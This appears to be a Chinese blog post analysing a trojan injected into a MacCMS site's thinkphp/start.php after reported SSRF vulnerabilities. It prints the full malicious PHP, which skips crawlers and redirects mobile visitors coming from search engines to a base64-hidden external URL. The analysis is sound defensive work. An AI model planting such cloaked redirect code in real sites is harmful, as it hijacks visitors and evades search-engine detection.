苹果CMS被植入木马分析(Maccms)

近期网上有人追踪到 maccms 2025.1000.4050 版本有漏洞容易被人恶意利用

CVE-2025-10395

Magicblack MacCMS 2025.1000.4050 版本中发现一个漏洞。该漏洞影响组件“计划任务处理程序”的函数 col_url。对参数 cjurl 进行操作会导致服务器端请求伪造。攻击者可以利用该漏洞远程发起攻击。

参考:

CVE-2025-10397

Magicblack MacCMS 2025.1000.4050 中发现一个漏洞。该漏洞影响组件 API Handler 的未知部分。对参数 cjurl 的操纵会导致服务器端请求伪造。该攻击可远程发起。该漏洞利用代码已公开,可能被利用。

参考:

然后,我就中奖了

对方将木马植入到 thinkphp/start.php 里面

<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006~2018 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------

namespace think;
$agentt = strtolower($_SERVER['HTTP_USER_AGENT']);          // 1. 取出 User-Agent 并转小写
if(stripos($agentt,'spider') == false && stripos($agentt,'bot')== false) {   // 2. 过滤掉爬虫/机器人(避免搜索引擎检测)
    if(stripos($agentt, 'ios') || stripos($agentt, 'android') || stripos($agentt, 'iphone') || stripos($agentt, 'ipad') || stripos($agentt, 'Harmony')) { // 3. 仅针对移动设备(包含 Harmony)
        $laiyuan=@strtolower($_SERVER['HTTP_REFERER']);   // 4. 取 Referer 并转小写
        if (stripos($laiyuan, 'baid') || stripos($laiyuan, 'bing') || stripos($laiyuan, 'sm') || stripos($laiyuan, 'so') || stripos($laiyuan, 'google') || stripos($laiyuan, 'Harmony'))  {
            $new_url=base64_decode('aHR0cHM6Ly9kZC5la2Njay5jb20vZG93bmxvYWQvNjQxM18wLmh0bWw='); // 5. base64 -> 跳转目标
            header("Location:$new_url");   // 6. 服务器端 302/301 跳转(立即跳走)
            exit;                          // 7. 结束脚本,页面不会继续输出
        }   
    }
}
require __DIR__ . '/base.php';
App::run()->send()

这木马仅针对移动装置进行跳转,而且连鸿蒙系统都考虑进去

READ  如何区分真实用户跟蜘蛛设置访问权限(苹果cms)
赞(0)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《苹果CMS被植入木马分析(Maccms)》
文章链接:https://www.rank50.com/technique/2962.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。

评论 抢沙发

登录

找回密码

注册